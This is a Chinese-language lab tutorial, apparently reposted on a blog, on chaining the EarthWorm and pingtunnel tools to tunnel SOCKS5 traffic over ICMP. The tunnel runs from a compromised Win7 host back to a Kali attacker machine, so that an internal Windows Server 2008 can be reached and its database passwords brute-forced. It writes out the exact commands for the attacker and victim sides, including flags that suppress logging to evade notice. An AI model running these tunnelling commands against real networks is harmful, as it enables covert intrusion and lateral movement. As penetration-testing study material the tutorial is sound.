ew+pingtunnel組合建立socks5隧道


 
 
 
 
 
 
 
 
 
 
 

0x00 實驗環境

攻擊機:win(192.168.43.131)+kali(192.168.43.217)

受害機:win7(IP:192.168.43.50、192.168.59.133;雙網卡,一個公網一個內網)、winserver2008(IP:192.168.59.18;僅主機:一個內網)

 

0x01 實驗效果

在已經拿到公網win7服務器的前提下,通過ew與pingtunnel搭建能通往winserver2008的隧道,獲取winserver2008的服務器權限

 

0x02 實驗准備

工具:ew、pingtunnel、proxifer(代理工具)

https://github.com/idlefire/ew
https://github.com/esrrhs/pingtunnel

proxifer官網自行下載

工具介紹:

ew

EarthWorm是一款用於開啟 SOCKS v5 代理服務的工具,基於標准 C 開發,可提供多平台間的轉接通訊,用於復雜網絡環境下的數據轉發。

 

 

pingtunnel

pingtunnel 是把 tcp/udp/sock5 流量偽裝成 icmp 流量進行轉發的工具

 

 

 0x03 打通隧道

1、kali執行:

./ew_for_linux64 -s rcsocks -l 10080 -e 8898

10080作為連接隧道的端口,8898作為隧道的通道,可以想象為,通向內網主機的路口為10080,走的這條路為8898。8898上所有的人(流量)都會通往10080這個路口。

 

 

2、kali執行:

./pingtunnel -type server
意思是將ew啟動的sock5協議轉換為icmp協議來隱藏傳輸

 

 

3、肉雞win7執行:

pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.43.217 -t 192.168.43.217:8898 -sock5 -1 -noprint 1 -nolog 1
意思是8898這條路上的sock5流量信息隱藏為icmp類型的數據在本肉雞的9999端口進行轉發。

 

4、肉雞win7執行:

ew.exe -s rssocks -d 127.0.0.1 -e 9999
在本肉雞9999端口開啟轉發流量

 

出現上述錯誤時,是因為你在運行pingtunnel時沒有以管理員的身份運行cmd

如下就可以顯示成功了:

 

5、kali上出現OK字樣時表示代理搭建完成:

 

6、使用proxifer來訪問內網:

 

此時再次訪問win2008那台僅僅為內網的主機:

 

7、kali通過win7搭建了隧道,實現了內網橫向的證明:ping winserver2008是不通的,但是掛好代理可以進行59.18的數據庫弱口令爆破!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM